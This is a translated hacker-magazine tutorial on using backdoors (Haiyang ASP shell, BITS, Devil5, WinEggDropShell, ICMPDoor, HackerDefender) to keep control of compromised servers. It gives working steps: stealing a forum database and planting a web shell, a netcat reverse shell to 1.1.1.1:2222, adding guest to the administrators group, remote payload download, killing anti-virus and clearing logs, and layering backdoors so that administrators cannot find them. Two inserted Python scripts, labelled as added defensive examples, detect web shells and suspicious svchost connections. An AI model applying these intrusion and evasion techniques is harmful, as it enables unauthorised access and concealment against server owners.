What is a back door?
A backdoor program, also known as a Trojan horse, is meant to lurk inside a computer, collecting information or making it easier for a hacker to get in. The biggest difference between a backdoor program and a computer virus is that a backdoor does not necessarily replicate itself; that is, a backdoor program does not necessarily "infect" other computers.
A backdoor is a way of logging into a system that not only bypasses the system's existing security settings but also defeats whatever enhanced security settings have been added to it.
Backdoors come in many types, from simple to exotic. A simple backdoor may just create a new account or take over a rarely used one; a complex backdoor (including a Trojan) may bypass the system's security authentication and obtain privileged access to the system. For example, entering a specific password grants access to the system with administrator privileges.
Backdoors can be chained together, and many hackers use this technique. For example, a hacker may crack the passwords of one or more accounts, or create one or more accounts. Once a hacker can access the system, he may use some technique or exploit a vulnerability in the system to raise his privileges. He may modify the system's configuration files to weaken its defenses, or install a Trojan so that the system opens a security hole that lets him take full control of it.
The above is the common explanation of "backdoor" found on the Internet. In fact it can be summed up in one simple sentence: a backdoor is something left behind in a computer system so that the system can be controlled in a particular way later. Obviously, mastering backdoor technology is an indispensable basic skill for every network security enthusiast! It lets you keep a firm grip on your "broilers" (compromised machines) so they never fly away!
Based on my experience in network security work, the following explains the types of backdoors currently in use on the network, how they are used, and related tricks. I hope everyone can learn the best techniques in the shortest time and raise their own level of network security skill!
Back door classification
Backdoors can be classified in many ways, and different criteria naturally give different classifications. To make things easy to understand, we will classify backdoor programs by technique:
1. Web backdoor
Backdoors of this kind build their own connection on top of a normal web service running on the server, for example the ASP and CGI script backdoors that are very popular at the moment.
2. Thread insertion
This kind inserts the backdoor program into a service or thread belonging to the system itself. The specific principle has already been explained in a dedicated Hacker Defense article, which interested friends can look up. This is also the most popular backdoor technique today.
3. Extended backdoor
The "extension" refers to a big improvement in functionality, which makes this kind far more practical than an ordinary single-function backdoor. Such a backdoor is in effect a small security toolkit that can perform a great many common security functions, and it suits novices. However, the stronger the functionality, the more it departs, in my personal view, from the original intention of a backdoor, which is to stay hidden; opinions on this come down to personal preference.
4. C/S backdoor
A control method similar to a traditional Trojan: the "client/server" model, in which the backdoor is started through a particular access method and then used to control the server.
5. Rootkit
This needs to be explained separately. Strictly speaking it is not quite appropriate to list it on its own, but rootkits have greatly changed the way backdoor programs are thought about and used. You could say a good rootkit is a complete system killer! When we get to it later, it will not disappoint!
The above is a classification by technique; as you can see, the types differ only in what they do!
Intrusion treasures: boutique backdoors
Tired of all that "nonsense"? OK, let's take a look at the backdoors that are popular on the network now. If you want to learn network security and improve, you cannot escape their grasp!
1. Web backdoors
Attacks exploiting system vulnerabilities have become rarer recently, because everyone has realised that the easiest and most effective way to improve network security is to patch and upgrade, so the lifetime of a system vulnerability is getting shorter and shorter. Judging by recent trends, script vulnerabilities have gradually taken the place of system vulnerabilities, many people have started studying them, and SQL injection has become a hot topic on all the major security sites. When it comes to scripts, the web is of course the first thing to mention. The mainstream pattern of domestic intrusions now is to use some script vulnerability to upload a script backdoor, then browse the programs installed on the server, look for a way to raise privileges, and finally obtain system authority on the server. ASP, CGI and PHP are the three most widely used scripting languages on the network, and script backdoors exist for all three. Let's look at one:
Haiyang Top ASP Trojan
This is a very widely circulated ASP script backdoor. After several major revisions it spawned the "Haiyang Top ASP Trojan XP Edition", "Haiyang Top ASP Trojan Red Powder Beauty Edition" and other versions that are powerful and easy to use; friends who often play with web security will not be unfamiliar with it.
Type: Web Trojan
Use range: ASP-enabled servers, accessed via the web
Concealment: ★★★★☆
Difficulty of use: ★☆☆☆
Harm level: ★★★☆☆
Detection/removal difficulty: ★★★☆☆
Server systems are now configured relatively securely and an open system vulnerability is a rare opportunity, so scripts are where the action is.
Use example: first we obtain page-level access to a server in some way (for example through a forum with lax settings: SQL injection, obtaining upload rights on an ASP system, or uploading a specific program to a server whose physical path is known). Then we simply upload the ASP program, or copy the Haiyang code directly, and access it through the web; we can then easily read the information on the server. A simple example follows (this is only a brief introduction, so the example is neither too hard nor too common; I hope everyone understands). LEADBBS 2.77 was once popular on the network; it is a typical ASP forum and shields many points where SQL could be injected, but many "fool-level" administrators always like the default installation and then enable the forum. We only need to type WWW.***.COM/BBS/DATA/LEADBBS.MDB into IE to download the forum's database directly, and it is not even MD5 encrypted! We look up the administrator's account and password directly, log in to the forum, replace the forum's "Contact Us", "Help" and similar ASP files with our Haiyang script, and can then run cmd commands with Guest rights: convenient upload/download of programs, remote execution and so on. A hidden backdoor is built! It is also a route to the server's SYSTEM privileges. Generally speaking, Haiyang is very powerful and not easy to detect (one approach a friend takes is to upload the web backdoor through a script vulnerability, upload another backdoor to a hidden path, and then use the second backdoor to delete the first Haiyang copy, so the backdoor's storage path can be made very deep).
It is very hard for an ordinary administrator to find. If the administrator suspects that such a backdoor may be present, he can use the forum backup to restore his own page system, then go through the system logs and forum logs and look for suspicious ASP files; opened up, a Haiyang script is very easy to recognise, and it can then be deleted.
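The administrator's remedy just described (restore from the forum backup, then hunt for suspicious ASP files and check whether the database is reachable from the web) can be automated. This is an added example, not code from the article or from any of the tools it names; the file trees and file contents are constructed, and the web-shell markers are heuristics chosen for the example.

```python
"""Integrity audit of a forum web root against its known-good backup.

Added example, not code from the article or from the tools it names. It
automates the administrator's remedy above: compare the live tree with the
backup, pull out new or changed script files, flag the ones that look like
web shells, and report any Access database sitting inside the web root
(which is what made the LEADBBS database downloadable). Trees are
{relative_path: bytes} mappings; the sample trees and the shell markers
are constructed for the example.
"""
import hashlib
import os
import re
from typing import Dict, List

# Extensions IIS/Apache hand to a script engine; new or changed files with
# these extensions are the first place to look.
SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx", ".cgi", ".php"}
# An Access database under the web root can be fetched by anyone who knows
# (or guesses) its path.
DB_EXT = {".mdb"}
# Heuristic markers for ASP web shells (chosen for this example, not the
# signature of any particular tool).
SHELL_MARKERS = [re.compile(p, re.I) for p in (
    r"\bexecute\s*\(\s*request",
    r"\beval\s*\(\s*request",
    r"wscript\.shell",
    r"scripting\.filesystemobject",
    r"adodb\.stream",
)]

def snapshot_dir(root: str) -> Dict[str, bytes]:
    """Read every file under root into a {relative_path: bytes} mapping."""
    tree = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                tree[rel] = fh.read()
    return tree

def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def _ext(path: str) -> str:
    return os.path.splitext(path)[1].lower()

def compare_trees(baseline: Dict[str, bytes], live: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Classify live files as added, modified or removed relative to the backup."""
    return {
        "added": sorted(p for p in live if p not in baseline),
        "modified": sorted(p for p in live if p in baseline
                           and digest(live[p]) != digest(baseline[p])),
        "removed": sorted(p for p in baseline if p not in live),
    }

def looks_like_shell(data: bytes) -> bool:
    text = data.decode("latin-1")  # never fails; good enough for a marker search
    return any(m.search(text) for m in SHELL_MARKERS)

def audit(baseline: Dict[str, bytes], live: Dict[str, bytes]) -> Dict[str, List[str]]:
    diff = compare_trees(baseline, live)
    changed_scripts = sorted(p for p in diff["added"] + diff["modified"]
                             if _ext(p) in SCRIPT_EXT)
    return {
        "changed_scripts": changed_scripts,
        "suspicious_scripts": [p for p in changed_scripts if looks_like_shell(live[p])],
        "removed": diff["removed"],
        "exposed_databases": sorted(p for p in live if _ext(p) in DB_EXT),
    }

# Constructed sample: the forum backup, and the live tree after the kind of
# tampering described above (help page replaced, extra ASP file dropped in).
BASELINE = {
    "bbs/index.asp": b'<% Response.Write "LeadBBS" %>',
    "bbs/help.asp": b'<% Response.Write "Help page" %>',
    "bbs/data/leadbbs.mdb": b"\x00\x01\x00\x00Standard Jet DB",
}
LIVE = dict(BASELINE)
LIVE["bbs/help.asp"] = b'<% Execute(Request("cmd")) %>'
LIVE["bbs/images/up.asp"] = b'<% Set fso = Server.CreateObject("Scripting.FileSystemObject") %>'

if __name__ == "__main__":
    for key, paths in audit(BASELINE, LIVE).items():
        print(f"{key}: {paths}")
```

Against real directories, call audit(snapshot_dir(backup_root), snapshot_dir(web_root)).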
Script backdoors also exist for both CGI and PHP. The principle of use is almost the same, so they are not introduced here. All three backdoors are also included on the Hacker Defense forum, where you can download and study them yourself.
2. Thread insertion backdoors
First, a brief explanation of what a typical "thread insertion" backdoor is: this kind of backdoor has no process of its own when running; all its network operations are carried out inside the process of another application. That means even if the firewall installed on the controlled end has "application access control", it cannot effectively warn about or intercept such a backdoor, which makes the other side's firewall a mere decoration! This is a very mainstream kind of backdoor and gives defenders a headache, because it is hard to detect and remove, and the backdoor itself is fairly powerful: a must-have item "for home, travel and intrusion". The model here is BITS, which promotes sharing on the Internet. Since its release it has been at the top of the download lists on all kinds of security tool sites, and many friends have used it; it is very convenient.
BITS
Type: System backdoor
Use range: Win2000/XP/2003
Concealment: ★★★★☆
Difficulty of use: ★★★☆☆
Harm level: ★★★★☆
Detection/removal difficulty: ★★★★☆
BITS is in fact the abbreviation of Background Intelligent Transfer Service; in another sense it implements a typical thread insertion backdoor without anyone noticing. Its characteristics: it cannot be seen in the process manager; it opens no port, acting only as an "undercover agent"; it provides both forward and reverse connection; it works only on Windows 2000/XP/2003.
Use example: first log in to the compromised machine via 3389 and confirm you have SYSTEM privileges, copy bits.dll to the server, and execute the cmd command rundll32.exe bits.dll,install to activate BITS. The program's feature string is used to identify the user and is equivalent to your password. To uninstall: rundll32.exe bits.dll,uninstall
That is the simplest use. Besides being very well hidden, it has two major characteristics: port reuse, and forward and reverse connection. Many friends often hear these two terms without understanding them. Port reuse means communicating and controlling over a port the system already uses normally, such as 80 or 139; the great advantage of such a backdoor is that it is very well hidden. You need not open a port of your own and expose your visit, because the communication itself looks like normal access to the system! The other is reverse connection. This is very common and a classic idea in backdoors: because the connection is initiated from the server side rather than from outside, it is not blocked, and many otherwise nasty firewalls are powerless against it!
The forward connection of BITS is very simple; refer to its readme. It is used when the server has no firewall and connects easily, but it is no good where a firewall is present. There you have to use the following reverse connection method:
Listen locally with NC (e.g. nc -l -p 1234)
Use NC to connect to any TCP port on the target host that the firewall allows (80/139/445 ...)
Enter the activation command: hkfx@dancewithdolphin[rxell]:1.1.1.1:2222
The target host's CMD will appear on the NC instance listening on port 2222, which is how the firewall is bypassed.
Devil5 (Devil 5)
Type: System Back Door
Use range: Win2000/XP/2003
Concealment: ★★★★☆
Difficulty of use: ★★☆☆☆
Harm level: ★★★★☆
Detection/removal difficulty: ★★★☆☆
Like BITS, Devil5 is a thread insertion backdoor, but unlike BITS it lets you conveniently customise the port and the thread to insert into through a GUI, which makes it convenient to use. Since the inserted thread is customised, it is harder to detect and remove. Let's look at how it is used.
Use example:
First use its own configuration program EditDevil5.exe to configure the backdoor: control port, thread to insert, connection password, time interval and so on. The key point is that the thread to insert is customisable; it is usually set to SVCHOST, which the system has anyway. Then run the backdoor and it can be controlled.
We connect with Telnet, in the form: telnet *** customised-port. What differs from other backdoors is that the interface has no prompt; each command is executed separately and must carry the password every time. For example, having lost the server's administrator account, you can promote guest to administrator privilege, remembering to add "> password" after each command: net localgroup administrators guest /add > HKFX. Then you can control the server.
Clearly, Devil5 has some defects compared with the BITS described earlier: it cannot communicate over a port already in use, you have to enter the password with every command, and it does not echo what you type, so mistakes are easy. But it has its own advantages: the inserted thread can be customised, and setting it to an IE thread, for example, makes it harder to detect and remove; a special removal tool DelDevil5.exe is provided to help protect your own system; and it can be renamed and bound, so it is more flexible to use than BITS. Which to choose depends on your preference.
In addition, PortlessBackdoor and other tools are backdoors of this kind, powerful and well hidden; those interested can study them.
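From the defender's side, the thread insertion backdoors above (BITS, Devil5) leave no process of their own, so the clue is the host process: svchost.exe holding an outbound connection to an unusual port (the reverse connection described above), or a listener on a port that no normal service owns. The script below correlates netstat -ano with tasklist output; it is an added example, not code from the article or from any tool it names, and the two command outputs, the expected-listener table, the system-image set and the internal address ranges are constructed assumptions to be tuned per host.

```python
"""Correlate netstat -ano with tasklist to surface thread-insertion traffic.

Added example, not code from the article or any tool it names. A thread-
inserted backdoor has no process of its own, so the clue is the host
process: svchost.exe holding an outbound connection to an odd port (the
reverse connection above) or listening where no service should. The command
outputs are constructed; the tables below are assumptions to tune per host.
"""
import ipaddress
import re
from typing import Dict, List, NamedTuple

class Conn(NamedTuple):
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str
    pid: int

class Finding(NamedTuple):
    rule: str
    pid: int
    image: str
    detail: str

# Image expected to own each listening port on this host (assumed).
EXPECTED_LISTENERS = {80: {"inetinfo.exe"}, 139: {"System"},
                      445: {"System"}, 3389: {"svchost.exe"}}
# Processes a thread-insertion backdoor typically rides inside.
SYSTEM_IMAGES = {"System", "svchost.exe", "lsass.exe", "services.exe",
                 "winlogon.exe", "csrss.exe", "spoolsv.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Remote ports a system process may legitimately reach inside the LAN.
USUAL_REMOTE_PORTS = {53, 80, 88, 135, 139, 389, 443, 445}
NETSTAT_LINE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")
TASKLIST_LINE = re.compile(r"^(\S.*?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")

def _split_addr(addr: str):
    host, _, port = addr.rpartition(":")
    return host, int(port)

def parse_netstat(text: str) -> List[Conn]:
    """Parse the TCP rows of `netstat -ano` (UDP rows carry no state)."""
    conns = []
    for m in filter(None, map(NETSTAT_LINE.match, text.splitlines())):
        local, remote, state, pid = m.groups()
        conns.append(Conn(*_split_addr(local), *_split_addr(remote), state, int(pid)))
    return conns

def parse_tasklist(text: str) -> Dict[int, str]:
    """Map PID -> image name from `tasklist` output."""
    return {int(m.group(2)): m.group(1)
            for m in map(TASKLIST_LINE.match, text.splitlines()) if m}

def is_internal(ip: str) -> bool:
    try:
        return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)
    except ValueError:
        return False

def analyse(conns: List[Conn], pids: Dict[int, str]) -> List[Finding]:
    """Three checks. Limitation the article itself notes: a backdoor that
    reuses the legitimate port 80 listener adds no netstat row at all."""
    out = []
    for c in conns:
        image = pids.get(c.pid, "<unknown>")
        if c.state == "LISTENING":
            allowed = EXPECTED_LISTENERS.get(c.local_port)
            if allowed is None:
                out.append(Finding("unexpected-listener", c.pid, image, f"port {c.local_port}"))
            elif image not in allowed:
                out.append(Finding("listener-owner-mismatch", c.pid, image,
                                   f"port {c.local_port} expected {sorted(allowed)}"))
        elif c.state == "ESTABLISHED" and image in SYSTEM_IMAGES:
            if not is_internal(c.remote_ip) or c.remote_port not in USUAL_REMOTE_PORTS:
                out.append(Finding("system-process-outbound", c.pid, image,
                                   f"{c.remote_ip}:{c.remote_port}"))
    return out

# Constructed sample output (not captured from a real host).
NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1188
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1400
  TCP    10.0.0.5:1034          10.0.0.9:445           ESTABLISHED     4
  TCP    10.0.0.5:1047          198.51.100.7:2222      ESTABLISHED     1400
  TCP    10.0.0.5:1052          10.0.0.3:80            ESTABLISHED     1600
"""
TASKLIST = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Console                    0         28 K
inetinfo.exe                  1188 Console                    0      9,912 K
svchost.exe                   1400 Console                    0      5,040 K
iexplore.exe                  1600 Console                    0     18,400 K
"""
FINDINGS = analyse(parse_netstat(NETSTAT), parse_tasklist(TASKLIST))
```

On the sample, FINDINGS holds two entries: the rogue listener on 31337 and svchost.exe's outbound session to 198.51.100.7:2222.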
3. Extended backdoors
A so-called extended backdoor, in the ordinary sense, can be seen as a backdoor with many functions built into it, so that it can do a great deal and control compromised machines or servers directly and conveniently. This kind is very popular with beginners. It usually integrates file upload/download, system user detection, HTTP access, terminal installation, port opening, starting/stopping services and so on; it is a small toolkit in itself, and powerful.
WinEggDropShell
Type: System Back Door
Use range: Win2000 / XP / 2003
Concealment: ★★★★☆
Difficulty of use: ★★☆☆☆
Harm level: ★★★★☆
Detection/removal difficulty: ★★★★☆
This backdoor is representative of the extended backdoor. Its functions are comprehensive to the point of excess; it can do the following:
Process management: view and kill processes (kill by process name or PID)
Registry management (view, delete, add, etc.)
Service management (stop, start, enumerate, configure, delete services)
Port-to-program association (FPORT)
System restart, custom power-off, logout and so on (Reboot, Poweroff, ShutDown, Logoff)
Password sniffing
Install terminal services, change the terminal port
Port redirection (multi-threaded, with connector IP restriction)
HTTP service (multi-threaded, with connector IP restriction)
SOCKS5 proxy (supports two different authentication modes, connector IP restriction)
Clone an account, detect cloned accounts (Clonclone)
Enhanced FindPassword (passwords of all logged-in users, including remote users logged in via cloned accounts)
HTTP proxy (fully anonymous; supports OICQ, MSN, mIRC and other programs)
Other auxiliary functions: HTTP download, log deletion, system information, restoring common file associations, enumerating system accounts, etc.
When this backdoor first appeared on the network, many people used it to replace their original backdoors and praise was loud, but most of those voices belonged to ordinary users. In fact it departs from the original definition of a "backdoor": once so many functions have to be implemented, the program has to deal with a great many problems of execution, hiding, stability and so on, and a single oversight leads to total failure. So it is not recommended where the backdoor needs to be very well hidden.
Use example
Before using this backdoor, you need to use the EditServer.exe program that comes with it to configure the server: there are about ten specific settings, including the thread to insert, the password, e-mail notification of the login IP, and so on. It is not hard to see that the functions are very powerful and the concealment also strong. Below are a few functions commonly used in intrusions; I believe friends who often play at intrusion will certainly appreciate its power:
Fport: lists the mapping of processes to ports, to discover which port each running program in the system corresponds to; it can be used to detect common hidden backdoors.
Reboot: restarts the system. If you upload and run another backdoor program that needs a reboot before it works, use this command!
Shell: gets a DOS shell; not much to say, it gives you a cmd shell on the server or compromised machine.
Pskill PID or program name: used to kill specific services, such as anti-virus software or firewalls.
Execute program: runs a program in the background, such as a sniffer.
Http://IP/filename savename: downloads a program, pulling a backdoor straight down onto the server.
InstallTerm port: installs terminal services on a Win2K system that does not have the Terminal Services component; it takes effect after a restart, and the connection port can be customised, for example a port other than 3389.
StopService / StartService: stops or starts a system service, such as Telnet.
Cleanevent: deletes the system logs.
Redirect: TCP data forwarding. This is a very good feature in a backdoor program: data on a certain port can be forwarded so that the internal network can be controlled through it, which is very useful when penetrating!
EnumService: enumerates all automatically started services, such as backdoors and Trojans.
Regedit: enters registry mode; users familiar with the registry have finally found their gospel in a backdoor!
FindPassword: gets the passwords of all logged-in users, much better than the FindPass tool we usually use.
......
Overall, WinEggDropShell is a very colourful backdoor. It has always been stable and its functionality is extremely powerful, but precisely because it is so powerful it is hard for it to avoid detection and suspicion. So it is quite normal for many people to find WinEggDropShell discovered after using it for a while; there is no need to be discouraged. I use a very simple way to improve its concealment, which is explained below.
Compared with WinEggDropShell, WinShell, which comes from the same lineage, is not so comprehensive, but the author recommends that beginners use WinShell rather than WinEggDropShell, because WinShell does only one thing: get a shell.
Both WinShell and WOLF are the top domestic backdoor programs of the early days. Their programming is undoubtedly classic; studying them as a newbie will help you understand a lot about the system and a lot of intrusion ideas and methods.
4. C/S backdoors
Traditional Trojans usually use a C/S architecture, which is convenient for control and also avoids the "universal password" situation, so it contributes something to keeping the backdoor private. This category is rather blurry and many backdoors could be assigned to it; a cleverer one is ICMPDoor.
ICMPDoor
Type: System backdoor
Use range: Win2000/XP/2003
Concealment: ★★★★★
Difficulty of use: ★★★☆☆
Harm: ★★★☆☆
Harm level: ★★★★☆
Detection/removal difficulty: ★★★★★
This backdoor communicates through an ICMP channel, so it opens no port at all; it uses only the system's own service to control the system, starts automatically at boot, and can penetrate many firewalls. Its biggest feature is plain to see: it opens no port and is controlled purely through ICMP! Compared with any other backdoor program its control method is very special; even port 80 need not be opened. You have to admire the author's unique angle of thought and vision!
Application example: where this backdoor is actually most useful is in controlling intranet computers after breaking through a gateway, because much confidential data sits on intranet computers, and a corporate intranet is not the kind of network we are used to. The company itself has some network security services, so the protection of intranet PCs is in place, and after trying many backdoors it was ICMPDoor that let me successfully penetrate the intranet! The author fell for this backdoor from then on.
First run icmpsrv.exe -install to install the backdoor, then use icmpsend.exe IP to control it. You can use the form [http://xx.xxx.xxx/admin.exep;-hkfx.exe] to download a file and save it in the System32 directory under the name hkfx.exe; if the program is given as "-" it is not saved. [pslist] lists the process names and PIDs on the remote host, and [pskill id] kills a process; in the same way, entering a normal CMD command makes the remote host execute it. This backdoor has a C/S architecture: you must use icmpsend to activate the server. But it also has an innate shortcoming: it depends on ICMP for communication, and on today's network, after the baptism of the Blaster worm, very few servers still accept ICMP packets; most have blocked them. So using it to control a server is not a good idea, which is why I use it to control intranet computers instead: inside an intranet, who blocks ICMP packets?!
5. Rootkit
If the backdoor programs above each have their own merits, compared with a classic rootkit they are all small fry. So what is a rootkit? Rootkits appeared in the early 1990s; in February 1994 the term was first used in a security advisory. From then on rootkit technology developed very rapidly, its application grew ever wider, and it became ever harder to detect. Most rootkits exist for the SunOS and Linux operating systems. Many people misunderstand rootkits as tools for obtaining root access; in fact a rootkit is a tool an attacker uses to conceal his own traces and retain root access.
Typically an attacker obtains root access via a remote attack. After entering the system, the attacker installs the rootkit on the compromised host and then regularly logs in through it as other users; if only he himself is logged in, the attacker just starts cleaning the relevant log entries. After obtaining users and passwords through the rootkit, the attacker uses that information to break into other systems. When rootkits migrated from *nix systems to Windows they kept all of these "terrible" characteristics! The rootkits common on the network now are kernel-level backdoor software: they can hide files, processes, system services, system drivers, registry keys and values, and open ports, and fake the available disk space. The program also disguises itself in memory, stealthily controls hidden processes, installs hidden backdoors, registers hidden system services and installs system drivers. The backdoor technique allows a redirector to be implanted, a thing that is very difficult to remove, so many administrators get a headache from it!
HackerDefender
Type: System backdoor
Use range: Win2000/XP/2003
Concealment: ★★★★★
Difficulty of use: ★★★★★
Harm level: ★★★★★
Detection/removal difficulty: ★★★★★ (yes, five stars for everything, because it is too "overbearing")
The latest version of hxdef is 1.0.0. It is a program from abroad and includes two key programs. Its INI configuration file is very complicated, and novices will find it hard to use. The main sections are: [Hidden Table], [Hidden Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports], [Settings].
Their functions are, respectively: hide files (directories), hide processes, hide services, hide registry keys, hide registry values, start programs, increase the reported free disk space, hide ports, and backdoor settings. We will not explain the specific configuration; a detailed introduction appears elsewhere in this issue. Let's talk instead about its characteristics (purely personal opinion and experience; please be forgiving):
(1) It can communicate over a normal system TCP port such as 80; this feature is nothing new among advanced backdoors.
(2) It gives a simple system shell, which is enough for an intrusion veteran; extra functions are just a burden.
(3) Hidden ports: if you must communicate over a very unconventional TCP port, use this feature and rest assured that nobody will find it.
(4) It hides everything about the backdoor! This can only be described in one word: awesome! For example hidden files, services, registry entries and so on.
(5) The most classic backdoor idea in history: used together with another extended backdoor, the effect exceeds your expectations! (That is later content; we will talk about it shortly.)
Leaving other things aside, once such a rootkit is installed on a system you cannot detect the program through ordinary detection and removal methods; that alone makes the program worth it! Imagine: a backdoor running on your server that you cannot see, let alone remove! Note: because this backdoor is too harmful, the editor has specially removed it from the CD. Friends who like studying backdoor programs can research it, but please note that you should not run the program casually, since detecting and removing it is very troublesome. Reinstalling the system directly is the answer!
Classic backdoor thinking
Right now many friends are trying to develop backdoor programs, and they try to cram a great many functions into them, as if what they wanted were not a backdoor but an operating system! Obviously this is wrong! A good backdoor can do one very single thing: its purpose is not to control the server, but to give you a way to control the server again when you have lost your normal means of control! So do not use a backdoor program casually, and of course do not let your backdoor program become too much. All network security tools share one concern: hiding! Now that netizens' security awareness has improved, anti-virus software and system security programs are no longer "treasures", so even if your backdoor program can do twenty thousand things, it is useless if anti-virus software can easily detect it! In other words, if someone can easily look at the processes, check the registry or see a problem in the port list, you are finished! So remember: hiding is the most important thing! Many friends like to use a very powerful backdoor program to control a server; it may be hidden, but once it is detected they can only stare at the server and cry. In fact we can solve this problem in a simple way: embed a set of complementary backdoor programs!
Once one backdoor is exposed, another backdoor, or several, are still on the server. This is very simple but involves a lot of intrusion experience and method, and also involves rootkits; we will talk about it later. On today's network, once a network security tool is published it spreads across the network in a very short time, so obviously the program's lifetime is very short and it will be detected within a few days. That is why all the programs listed in this article can be found on the Internet (they are also included on the CD); they are only here to give everyone better ideas and an introduction. Many good backdoors are private. I hope everyone can write their own outstanding backdoor through their own study! Through the explanation above, I believe everyone now has a certain understanding of the mainstream backdoor programs. This article cannot cover actual detection and removal methods; readers would find that boring, and after editorial review it could not be published anyway. The specific methods of use you have to explore yourselves. Let's talk about several personal views on classic backdoor thinking.
First, a nod to WTF, who said in the Hacker Defense laboratory: "Brothers, don't stick to one style of thinking. I know that in security the most important thing is to exercise and cultivate conscious thinking. To exercise everyone's thinking ability, a friendly reminder: we have put a lot of traps in the levels! Don't be fooled by appearances!" Read this sentence carefully and apply it to network intrusion and attack: a lot of thinking branches off from it, and that is an improvement in overall level! Take our backdoors: same functions, well-hidden backdoor, so why is it that when you put it on a compromised machine it is removed within three days, while someone else's keeps working? This is where the importance of a change of thinking shows. Here we talk specifically about how backdoor programs can achieve a good change of thinking and what characterises it. First, the misconceptions of ordinary netizens:
(1) An ordinary security enthusiast breaks into a server through a common system vulnerability or another route, then creates a new account and adds it straight to the administrators group; if a little more careful, he adds a $ to the account name so that others cannot discover it, and then controls the server through 3389 or 23. Sweat! Is this what you got out of reading Hacker Defense? Is that what it teaches you? Are all administrators ignorant of the most important accounts on their own system? Such a compromised machine will be lost within a day!
(2) Control the server -> upload a backdoor -> open a specific port -> control the server through the backdoor, getting the administrator's password on the way with classic tools such as FindPass, opening 3389 on the server... To such a friend, one word: dizzy! A simple netstat -an is all it takes to expose your connection! Then you can wait for the court!
(3) Cloning the system's built-in accounts and using them to log in to the server is also an unsound method.
In my experience such compromised machines definitely do not last long! They fly away in a day or two! The above are just relatively low-level mistakes; I believe nobody will make them after reading this article. Let's talk about more secure ways of controlling a compromised machine. If among what I say today there are two or three sentences that you remember in future intrusions and in security protection, I will be gratified! During an ordinary intrusion, 3389 is of course the favourite way of control, but why would you use only 3389 to control a server? How do you control it when the other side turns 3389 off? So you need a backdoor. Then you install an ordinary classic backdoor, and why does my compromised machine fly away in such a short time? Please note: no system administrator is an idiot! No matter how "black" you are, your remote control of the server involves no physical contact; can you stop him unplugging the network cable or formatting the hard disk so that you can never control it again?! Therefore the concealment of the backdoor is very important: the administrator must not be able to find that there is a backdoor in the system! A good backdoor can do a single thing, and you must not use your backdoor program to control the compromised machine frequently, so that it does not fly away. The better way is: 3389/23 -> extended backdoor -> rootkit. This is the most classic backdoor combination so far. It is also easy to see why: when the other side finds a connection from an unknown IP, he will definitely check the system for problems, change the system password and clean up the accounts; that is inevitable.